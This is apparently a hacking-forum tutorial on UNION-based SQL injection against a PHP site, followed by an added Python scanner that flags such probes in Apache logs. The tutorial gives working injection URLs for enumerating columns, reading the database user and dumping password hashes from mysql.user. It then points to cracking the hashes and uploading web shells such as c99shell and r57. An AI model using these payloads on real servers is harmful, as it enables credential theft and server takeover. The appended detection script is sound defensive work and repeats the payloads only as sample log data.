This is a vulnerability a lot of hackers use when attacking web servers. By web servers I mean applications running IIS or Apache, which are commonly used for hosting sites. This attack simply allows an attacker to alter backend SQL statements by manipulating the user input. To learn more about SQL injection, there are a lot of white papers on the net that can really help. See these pages,
And many others online
Let's take an example in PHP, aite?
Let's say our site is www.sitevulnerable.com/index.php
index.php is vulnerable to SQL injection. So how would we attack? www.sitevulnerable.com/index.php?id=-1
Maybe you are asking me why 1; you can use any number, 1010101, whatever.
The injection above may give an error, and actually these errors are the ones I will use to pick up passwords, tables etc.
So we go on by enumerating the tables.
www.sitevulnerable.com/index.php?id=-1 union select 1/*
We are using /* to close the query so as to grep in the DB.
So we will continue adding columns like this until we get an output that will help us.
www.sitevulnerable.com/index.php?id=-1 union select 1,2/*
Remember, with this we are just grepping the DB for id 1, which probably is root.
www.sitevulnerable.com/index.php?id=-1 union select 4,3,2,1/*
and then I get an error like
We are still rolling........
So I will inject a crafted query like this
www.sitevulnerable.com/index.php?id=-1 union select 4,DATABASE(),2,USER()/*
And the error I get will be the user name in the DB.
So let's grep the password from the DB
www.sitevulnerable.com/index.php?id=-1 union select host,host,2,password from mysql.user/*
And our error is
Now that is a hashed MySQL password, which can be brute-forced using John the Ripper.
Download from here
So if I get the password, how will I log in to the DB and upload my files?
Simple, get a running shell, like c99shell, c100, r57 etc. etc.; they are all over the internet.
A simple screenshot is shown below.
Hope this helped, signing off,
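As an added defender's example (not part of the original post), here is a small Python scanner that runs over constructed Apache access-log lines and flags the UNION-based probes walked through above, after undoing percent-encoding, `+`-for-space and inline `/**/` comments. The log lines, IP addresses and signature names are made up for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample Apache access-log lines (combined format), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=-1%20union%20select%201,2/* HTTP/1.1" 500 312 "-" "curl/7.68"
10.0.0.9 - - [10/Oct/2023:13:55:44 +0000] "GET /index.php?id=-1+union/**/select+4,DATABASE(),2,USER()/* HTTP/1.1" 200 980 "-" "curl/7.68"
10.0.0.9 - - [10/Oct/2023:13:55:50 +0000] "GET /index.php?id=-1%2520union%2520select%2520host,host,2,password%2520from%2520mysql.user/* HTTP/1.1" 200 1400 "-" "curl/7.68"
10.0.0.7 - - [10/Oct/2023:13:56:01 +0000] "GET /about.php?page=union-workers HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Indicators of the UNION-based technique described in the post (names are ours).
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s*(?:all\s+)?\bselect\b"),
    "mysql_user_table": re.compile(r"\bmysql\.user\b"),
    "db_info_function": re.compile(r"\b(?:database|user|version)\s*\("),
    "comment_terminator": re.compile(r"(?:/\*|--|#)\s*$"),
}

def normalize(query: str) -> str:
    """Undo common evasions: repeated percent-encoding (e.g. %2520), '+' as space,
    and /**/ comments used instead of whitespace. Lower-cased for matching."""
    decoded = query
    for _ in range(3):                      # bounded: handles double/triple encoding
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)   # closed inline comments only
    return re.sub(r"\s+", " ", decoded).lower().strip()

def scan(log_text: str):
    """Return (client_ip, status, [indicator names]) for each flagged request.
    A request is reported only when union_select matches; other hits add context."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, url, status = m.group(1), m.group(2), int(m.group(3))
        query = url.partition("?")[2]
        if not query:
            continue
        norm = normalize(query)
        hits = [name for name, rx in SIGNATURES.items() if rx.search(norm)]
        if "union_select" in hits:
            findings.append((ip, status, hits))
    return findings

if __name__ == "__main__":
    for ip, status, hits in scan(SAMPLE_LOG):
        print(f"{ip} status={status} indicators={','.join(hits)}")
```

The 500 on the first flagged request is the same "error" the post relies on, so pairing the status code with the decoded query is a cheap way to spot an enumeration run in progress.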